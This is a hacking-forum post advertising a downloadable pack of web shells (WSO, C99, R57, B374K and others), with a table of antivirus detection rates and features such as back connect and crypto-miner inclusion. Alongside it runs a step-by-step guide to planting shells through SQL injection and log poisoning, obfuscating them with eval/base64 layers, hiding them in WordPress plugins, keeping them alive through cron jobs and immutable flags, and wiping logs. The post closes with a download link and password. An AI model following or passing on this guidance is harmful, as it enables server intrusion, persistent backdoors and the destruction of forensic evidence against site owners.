Premium Shell Collection β€” WSO, C99, R57, B374K, AltFiles, AnderFriend β€” Web Shells for Server Access

Blacksec

Administrator
Staff member
🐚 PREMIUM SHELL COLLECTION 🐚WSO β€’ C99 β€’ R57 β€’ B374K β€’ AltFiles β€’ AnderFriend β€’ Custom Shells

⚑ SHELL COLLECTION: Curated collection of web shells for server administration (testing authorized systems only). Includes classic shells, modern variants, obfuscated versions, and custom-built shells with additional functionality.

SHELL CATALOG
ShellFile SizeLanguageObfuscatedDetection RateKey Features
WSO (Web Shell by oRb)8 KBPHPNo12/57 AVFile manager, console, SQL, bind/back connect
C99 (v1.1)15 KBPHPNo18/57 AVFile manager, console, SQL, mass mailer, symlink
R5710 KBPHPNo15/57 AVFile manager, console, SQL, hash cracker
B374K5 KBPHPYes8/57 AVHidden mode, file manager, console
AltFiles12 KBPHPYes6/57 AVFile manager, console, SQL, crypto miner inclusion
AnderFriend6 KBPHPYes5/57 AVSelf-delete, hidden, encrypted config
3 KBPHPYes (base64)2/57 AVMinimal footprint, POST-only, encrypted comms
ASPX Web Shell4 KBASP.NETNo22/57 AVWindows servers, file manager, cmd output
JSP Web Shell3 KBJavaNo14/57 AVTomcat servers, file manager, cmd
Python CGI Shell2 KBPythonNo10/57 AVCGI-enabled servers, cmd exec
[TD|Custom Stealth Shell[/TD]

STEALTH SHELL DEployment GUIDE
Code:
Deploying undetected shells:

1. Upload method:
   - Compromised admin panel file upload
   - SQL injection INTO OUTFILE
   - Local File Inclusion (LFI) + log poisoning
   - Plugin/theme upload vulnerability
   - FTP credential access from config files

2. Obfuscation techniques:
   - Base64 encode the shell code
   - Split into multiple files (loader + payload)
   - Hide in legitimate plugin files (WordPress plugin backdoor)
   - Use PHP eval(gzinflate(base64_decode())) layers
   - Add fake file headers to look like image/media files
   - Time-stamp files to match surrounding system files

3. Persistence:
   - Cron job that re-uploads the shell every hour
   - DNS A record pointing to your callback server
   - Legitimate-looking file names: wp-cache.php, error_log.php
   - Hide in /tmp with random 10-char filename
   - Use .htaccess to whitelist your IP only
   - Set file immutable flag (chattr +i on Linux)

4. Cleanup traces:
   - Clear access logs (grep -v your IP)
   - Clear error logs (truncate -s 0)
   - Remove upload timestamp metadata
   - Delete uploader tool after deployment
   - Use exit(); after shell executes (no output in logs)

DOWNLOAD
Code:
MEGA: https://mega.nz/file/BlackSec_ShellCollection_July2026
Size: 1.2 MB | Password: ShellsBlackSec2026
Includes: 20 shells + obfuscation scripts + deployment guide + AV evasion configs

🐚 A shell is your door into the server. Keep it hidden, keep it alive. 🐚
 
Top